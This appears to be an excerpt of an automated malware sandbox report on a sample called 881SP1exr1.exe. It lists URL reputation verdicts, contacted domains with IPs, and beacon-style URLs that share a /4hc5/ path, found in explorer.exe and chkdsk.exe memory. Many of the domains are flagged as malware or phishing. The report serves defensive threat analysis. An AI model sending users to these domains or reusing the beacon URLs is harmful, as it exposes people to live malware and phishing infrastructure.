          http://www.bollywood.nexus100%Avira URL Cloudmalware
          http://www.modluxenwa.com100%Avira URL Cloudmalware
          http://www.therealnikib.com100%Avira URL Cloudmalware
          www.iqixuehe.com/4hc5/100%Avira URL Cloudmalware
          http://www.lpqxmz.site/4hc5/www.tcbbuilds.com100%Avira URL Cloudphishing
          http://www.bollywood.nexus/4hc5/www.lpqxmz.site100%Avira URL Cloudmalware
          http://www.motionmixmedia.com/4hc5/www.castlegrouplt.com100%Avira URL Cloudmalware
          http://www.candicrem.comReferer:0%Avira URL Cloudsafe
          http://www.7141999.com100%Avira URL Cloudmalware
          http://www.7141999.com/4hc5/100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
          http://www.motionmixmedia.comReferer:0%Avira URL Cloudsafe
          http://www.modluxenwa.com/4hc5/www.vurporn.com100%Avira URL Cloudmalware
          http://www.slotjitu88.website100%Avira URL Cloudphishing
          http://www.iqixuehe.com/4hc5/www.candicrem.com100%Avira URL Cloudmalware
          http://www.lpqxmz.siteReferer:0%Avira URL Cloudsafe
          http://www.pacersun.comReferer:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
          http://www.showshoe.infoReferer:0%Avira URL Cloudsafe
          http://www.therenixgroupllc.com/4hc5/www.7141999.com100%Avira URL Cloudmalware
          http://www.therealnikib.com/4hc5/100%Avira URL Cloudmalware
          http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e100%Avira URL Cloudmalware
          http://www.therealnikib.com/4hc5/www.slotjitu88.website100%Avira URL Cloudmalware
          http://www.vurporn.com/4hc5/100%Avira URL Cloudmalware
          http://www.castlegrouplt.comReferer:0%Avira URL Cloudsafe
          http://www.vurporn.com/4hc5/www.motionmixmedia.com100%Avira URL Cloudmalware
          http://www.lpqxmz.site100%Avira URL Cloudmalware
          http://www.motionmixmedia.com/4hc5/100%Avira URL Cloudmalware
          http://www.pacersun.com100%Avira URL Cloudmalware
          http://www.therenixgroupllc.comReferer:0%Avira URL Cloudsafe
          http://www.7141999.com/4hc5/www.pacersun.com100%Avira URL Cloudmalware
          http://www.modluxenwa.com/4hc5/100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
          http://www.tcbbuilds.comReferer:0%Avira URL Cloudsafe
          http://www.pacersun.com/4hc5/100%Avira URL Cloudmalware
          http://www.tcbbuilds.com100%Avira URL Cloudmalware
          http://www.pacersun.com/4hc5/www.showshoe.info100%Avira URL Cloudmalware
          http://www.therealnikib.comReferer:0%Avira URL Cloudsafe
          http://www.candicrem.com/4hc5/www.therenixgroupllc.com100%Avira URL Cloudmalware
          http://www.vurporn.comReferer:0%Avira URL Cloudsafe
          http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv100%Avira URL Cloudmalware
          http://www.quailrun-inc.com/4hc5/www.bollywood.nexus100%Avira URL Cloudmalware
          http://www.quailrun-inc.comReferer:0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.candicrem.com
          199.34.228.191
          truetrueunknown
          flash.funnels.msgsndr.com
          34.68.234.4
          truefalse
            unknown
            www.7141999.com
            154.86.64.96
            truetrue
              unknown
              www.bollywood.nexus
              3.64.163.50
              truetrue
                unknown
                pacersun.com
                167.172.228.26
                truetrue
                  unknown
                  slotjitu88.website
                  45.64.97.60
                  truetrue
                    unknown
                    parkingpage.namecheap.com
                    91.195.240.19
                    truefalse
                      high
                      www.lpqxmz.site
                      103.120.80.111
                      truetrue
                        unknown
                        d3at2k7gv5wser.cloudfront.net
                        13.32.208.72
                        truefalse
                          high
                          www.iqixuehe.com
                          154.205.127.201
                          truetrue
                            unknown
                            www.pacersun.com
                            unknown
                            unknowntrue
                              unknown
                              www.slotjitu88.website
                              unknown
                              unknowntrue
                                unknown
                                www.therenixgroupllc.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.therealnikib.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.quailrun-inc.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.tcbbuilds.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0true
                                        • Avira URL Cloud: malware
                                        unknown
                                        www.iqixuehe.com/4hc5/true
                                        • Avira URL Cloud: malware
                                        low
                                        http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2true
                                        • Avira URL Cloud: phishing
                                        unknown
                                        http://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8efalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.iqixuehe.com/4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQvtrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://aka.ms/odirmrexplorer.exe, 00000003.00000000.1648506599.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://www.tcbbuilds.com/4hc5/www.therealnikib.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.therealnikib.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.quailrun-inc.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.quailrun-inc.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.candicrem.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://www.bollywood.nexusexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.vurporn.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.bollywood.nexusReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.lpqxmz.site/4hc5/www.tcbbuilds.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://excel.office.comexplorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.showshoe.info/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.bollywood.nexus/4hc5/www.lpqxmz.siteexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.sajatypeworks.com881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.modluxenwa.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.motionmixmedia.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn/cThe881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.7141999.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.slotjitu88.websiteexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://www.7141999.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.candicrem.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.motionmixmedia.com/4hc5/www.castlegrouplt.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.galapagosdesign.com/DPlease881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.iqixuehe.com/4hc5/www.candicrem.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.lpqxmz.siteReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.modluxenwa.com/4hc5/www.vurporn.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.showshoe.infoReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000000.1656205865.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.urwpp.deDPlease881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.pacersun.comReferer:explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cn881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.therealnikib.com/4hc5/explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.therealnikib.com/4hc5/www.slotjitu88.websiteexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://www.therenixgroupllc.com/4hc5/www.7141999.comexplorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.3105919399.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105163433.000000000C999000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105077677.000000000C970000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://wns.windows.com/Lexplorer.exe, 00000003.00000000.1656205865.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://word.office.comexplorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
